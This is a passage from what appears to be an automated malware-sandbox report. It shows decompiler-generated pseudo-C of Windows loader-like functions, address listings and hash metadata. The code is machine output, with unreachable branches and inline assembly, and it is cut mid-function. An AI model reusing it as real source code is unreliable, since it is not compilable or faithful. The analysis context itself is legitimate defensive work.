						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E036F2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E036F2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E036C58EC(_t240);
									_t221 =  *0x37b5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x37b5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E03704A2C(0x37b6e40, 0x3704b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E036E7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x36a5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E036FF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E036FF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E03747016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L036E2400(_t267 + 0x20);
															}
															L036E2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E036F2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E036E2280(_t134, 0x37b8608);
									__eflags =  *0x37b6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E036DFFB0(_t198, _t241, 0x37b8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x37b6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x37b8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E036F6B90(_t210,  &_v64);
										_t262 =  *0x37b8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E036FE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E037097C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0370006A(0x37b8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x37b8608);
												E0370B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x37b6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x37b6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E036DFFB0(_t198, _t240, 0x37b8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E037000C2(0x37b8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                      0x036f20a0
                                      0x036f20a8
                                      0x036f20ad
                                      0x036f20b3
                                      0x036f20b8
                                      0x036f20c2
                                      0x036f20c7
                                      0x036f20cb
                                      0x036f20d2
                                      0x036f2263
                                      0x036f2266
                                      0x03735836
                                      0x03735836
                                      0x00000000
                                      0x036f226c
                                      0x036f226c
                                      0x036f2270
                                      0x036f2274
                                      0x036f20e2
                                      0x036f20e2
                                      0x036f20e6
                                      0x036f20ee
                                      0x037357dc
                                      0x037357de
                                      0x037357ec
                                      0x037357ec
                                      0x037357f1
                                      0x037357f3
                                      0x037357f8
                                      0x00000000
                                      0x037357f8
                                      0x037357e0
                                      0x037357e4
                                      0x037357ea
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x037357ea
                                      0x036f20f4
                                      0x036f20f4
                                      0x036f20f8
                                      0x036f20f8
                                      0x036f20fc
                                      0x036f2100
                                      0x036f2106
                                      0x036f2201
                                      0x036f2206
                                      0x036f220b
                                      0x036f220e
                                      0x036f22a9
                                      0x036f22ac
                                      0x00000000
                                      0x00000000
                                      0x036f22b2
                                      0x036f22b5
                                      0x03735801
                                      0x03735806
                                      0x00000000
                                      0x00000000
                                      0x03735810
                                      0x03735815
                                      0x03735818
                                      0x00000000
                                      0x00000000
                                      0x0373581e
                                      0x036f22bb
                                      0x036f22bb
                                      0x036f2218
                                      0x036f2218
                                      0x036f221c
                                      0x036f2220
                                      0x036f2222
                                      0x036f22c2
                                      0x036f22c4
                                      0x036f22dc
                                      0x036f22dc
                                      0x036f22e1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x036f22e7
                                      0x036f22c8
                                      0x036f22cd
                                      0x036f22d3
                                      0x036f22d6
                                      0x03735823
                                      0x03735825
                                      0x03735827
                                      0x00000000
                                      0x00000000
                                      0x0373582d
                                      0x00000000
                                      0x0373582d
                                      0x00000000
                                      0x036f2228
                                      0x036f2228
                                      0x00000000
                                      0x036f2228
                                      0x036f2222
                                      0x036f2214
                                      0x036f2214
                                      0x00000000
                                      0x036f2114
                                      0x036f2114
                                      0x036f2114
                                      0x036f211a
                                      0x036f211c
                                      0x036f2348
                                      0x036f234d
                                      0x03735840
                                      0x03735845
                                      0x03735848
                                      0x0373584e
                                      0x0373584e
                                      0x03735848
                                      0x036f2353
                                      0x036f2355
                                      0x036f2388
                                      0x036f2388
                                      0x036f2368
                                      0x036f236a
                                      0x036f236c
                                      0x036f238f
                                      0x00000000
                                      0x036f236e
                                      0x036f236e
                                      0x036f218e
                                      0x036f218e
                                      0x036f2191
                                      0x036f2195
                                      0x03735a03
                                      0x03735a06
                                      0x03735a0c
                                      0x03735a0f
                                      0x03735a11
                                      0x03735a13
                                      0x03735a13
                                      0x03735a19
                                      0x03735a1f
                                      0x00000000
                                      0x036f219b
                                      0x036f219b
                                      0x036f21a0
                                      0x036f2282
                                      0x036f2284
                                      0x036f2284
                                      0x036f2284
                                      0x036f2284
                                      0x036f21a6
                                      0x036f21a9
                                      0x036f21ac
                                      0x036f21ae
                                      0x036f21b3
                                      0x036f228b
                                      0x036f2290
                                      0x036f2379
                                      0x036f2296
                                      0x036f2298
                                      0x036f2298
                                      0x036f2290
                                      0x036f21b9
                                      0x036f21be
                                      0x036f22a2
                                      0x036f22a2
                                      0x036f21c4
                                      0x036f21c8
                                      0x036f21cc
                                      0x036f21d0
                                      0x036f21d4
                                      0x036f21de
                                      0x036f21e3
                                      0x03735a29
                                      0x03735a2c
                                      0x00000000
                                      0x00000000
                                      0x03735a3b
                                      0x00000000
                                      0x036f21e9
                                      0x036f21e9
                                      0x036f21e9
                                      0x036f21ee
                                      0x036f21f1
                                      0x03735a45
                                      0x03735a4b
                                      0x03735a52
                                      0x03735a58
                                      0x03735a5d
                                      0x03735a5f
                                      0x03735a71
                                      0x03735a61
                                      0x03735a6a
                                      0x03735a6a
                                      0x03735a76
                                      0x03735a79
                                      0x03735a7f
                                      0x03735a83
                                      0x03735a85
                                      0x03735a87
                                      0x03735a87
                                      0x03735a8c
                                      0x03735a91
                                      0x03735a97
                                      0x03735a9f
                                      0x03735aa0
                                      0x03735aa1
                                      0x03735aa6
                                      0x03735aab
                                      0x03735ab1
                                      0x03735ab3
                                      0x03735ab9
                                      0x03735aca
                                      0x03735ad4
                                      0x03735ad4
                                      0x03735ade
                                      0x03735ade
                                      0x03735aab
                                      0x03735a79
                                      0x03735a52
                                      0x036f21f7
                                      0x036f21f9
                                      0x036f21fe
                                      0x036f21fe
                                      0x036f21e3
                                      0x036f2195
                                      0x036f236c
                                      0x036f2122
                                      0x036f2122
                                      0x036f2124
                                      0x036f2231
                                      0x036f2236
                                      0x036f2236
                                      0x036f2238
                                      0x036f2238
                                      0x036f2240
                                      0x036f2242
                                      0x036f2244
                                      0x037359fc
                                      0x036f218c
                                      0x036f218c
                                      0x00000000
                                      0x036f218c
                                      0x036f224a
                                      0x036f224f
                                      0x036f2256
                                      0x036f2304
                                      0x036f2309
                                      0x036f230f
                                      0x036f231e
                                      0x036f231e
                                      0x036f231e
                                      0x036f2320
                                      0x036f2325
                                      0x036f232a
                                      0x036f232c
                                      0x036f233e
                                      0x036f233e
                                      0x00000000
                                      0x036f232c
                                      0x036f2311
                                      0x036f2317
                                      0x036f231a
                                      0x036f231c
                                      0x036f2380
                                      0x036f2380
                                      0x036f2380
                                      0x036f2384
                                      0x00000000
                                      0x00000000
                                      0x036f2386
                                      0x00000000
                                      0x036f231c
                                      0x036f225c
                                      0x036f225c
                                      0x00000000
                                      0x036f225c
                                      0x036f212a
                                      0x036f2134
                                      0x036f2138
                                      0x036f213d
                                      0x03735858
                                      0x03735863
                                      0x03735863
                                      0x03735867
                                      0x0373586a
                                      0x00000000
                                      0x00000000
                                      0x0373586c
                                      0x0373586c
                                      0x03735871
                                      0x03735875
                                      0x03735877
                                      0x03735997
                                      0x0373599c
                                      0x037359a1
                                      0x037359a7
                                      0x037359a7
                                      0x00000000
                                      0x037359a7
                                      0x0373587d
                                      0x00000000
                                      0x0373588b
                                      0x0373588b
                                      0x03735890
                                      0x03735892
                                      0x03735894
                                      0x03735899
                                      0x0373589b
                                      0x037358a0
                                      0x037358a0
                                      0x037358aa
                                      0x037358b2
                                      0x037358b6
                                      0x037358be
                                      0x037358c6
                                      0x037358c9
                                      0x0373590d
                                      0x03735917
                                      0x0373591a
                                      0x0373591c
                                      0x03735920
                                      0x03735928
                                      0x0373592a
                                      0x0373592c
                                      0x0373592e
                                      0x0373592e
                                      0x037358cb
                                      0x037358cd
                                      0x037358d8
                                      0x037358e0
                                      0x037358f4
                                      0x037358fe
                                      0x037358fe
                                      0x0373593a
                                      0x0373593e
                                      0x03735940
                                      0x03735942
                                      0x00000000
                                      0x03735944
                                      0x03735944
                                      0x03735949
                                      0x0373594e
                                      0x0373594e
                                      0x03735953
                                      0x0373595b
                                      0x03735976
                                      0x03735976
                                      0x0373597a
                                      0x0373597f
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03735981
                                      0x03735981
                                      0x03735981
                                      0x03735983
                                      0x03735988
                                      0x0373598d
                                      0x03735991
                                      0x03735991
                                      0x00000000
                                      0x0373595d
                                      0x0373595d
                                      0x03735963
                                      0x03735965
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03735967
                                      0x03735967
                                      0x0373596b
                                      0x0373596d
                                      0x00000000
                                      0x00000000
                                      0x0373596f
                                      0x03735971
                                      0x03735971
                                      0x03735974
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x03735974
                                      0x00000000
                                      0x03735967
                                      0x0373595b
                                      0x03735942
                                      0x03735863
                                      0x036f2143
                                      0x036f2143
                                      0x036f2149
                                      0x036f214f
                                      0x036f22f1
                                      0x036f22f6
                                      0x00000000
                                      0x036f2173
                                      0x036f2173
                                      0x036f217d
                                      0x036f2181
                                      0x036f2186
                                      0x037359ae
                                      0x037359b2
                                      0x037359b5
                                      0x037359b7
                                      0x037359ba
                                      0x037359cd
                                      0x037359d1
                                      0x037359d5
                                      0x037359d9
                                      0x037359db
                                      0x00000000
                                      0x00000000
                                      0x037359dd
                                      0x037359dd
                                      0x037359e1
                                      0x037359e4
                                      0x037359e7
                                      0x037359ee
                                      0x037359ee
                                      0x037359f3
                                      0x037359f3
                                      0x00000000
                                      0x036f2186
                                      0x036f214f
                                      0x036f2106
                                      0x036f2266
                                      0x036f20d8
                                      0x036f20da
                                      0x036f20e0
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000010.00000002.485583016.00000000036A0000.00000040.00000001.sdmp, Offset: 036A0000, based on PE: true
                                      • Associated: 00000010.00000002.486108771.00000000037BB000.00000040.00000001.sdmp Download File
                                      • Associated: 00000010.00000002.486129834.00000000037BF000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c1963c60280fbbdfdb5c17c2cbe124b646d72cb4a52923905cd7079647944994
                                      • Instruction ID: e09ef8830819dcaca1f920599fe8ff846b0a3da3dbc7460e5c427053442e3010
                                      • Opcode Fuzzy Hash: c1963c60280fbbdfdb5c17c2cbe124b646d72cb4a52923905cd7079647944994
                                      • Instruction Fuzzy Hash: 84F16779A083459FD725CF28C85076BBBE9BF86324F08895DEA958B381D734D841CF86
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 036DD5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 87%
                                      			E036DD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x37bd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E036D6600(0x37b52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x37b7b9c; // 0x0
							_t281 = L036E4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0370F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x37b7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x37b7b8c; // 0x2e829d8
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E036E2280(_t200, 0x37b84d8);
									_t277 =  *0x37b85f4; // 0x2e83a88
									_t351 =  *0x37b85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x2e83a20
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E036DFFB0(_t287, _t353, 0x37b84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0371CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E036D6600(0x37b52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E036D7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x37bb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0374E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x37b8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x37bb218; // 0x0
														asm("ror edi, cl");
														 *0x37bb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E036E2280(_t250, 0x37b84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03703898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E036DFFB0(_t293, _t353, 0x37b84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E037037F5(_t353, 0);
																}
																E03700413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E036F9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E036F02D6(_t174);
																}
																L036E77F0( *0x37b7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E036FC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L036DEC7F(_t353);
										L036F19B8(_t287, 0, _t353, 0);
										_t200 = E036CF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0370B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x37bb2f8; // 0xdb0000
									if((_t206 |  *0x37bb2fc) == 0 || ( *0x37bb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x37bb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E03776B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E03776AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E036DE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
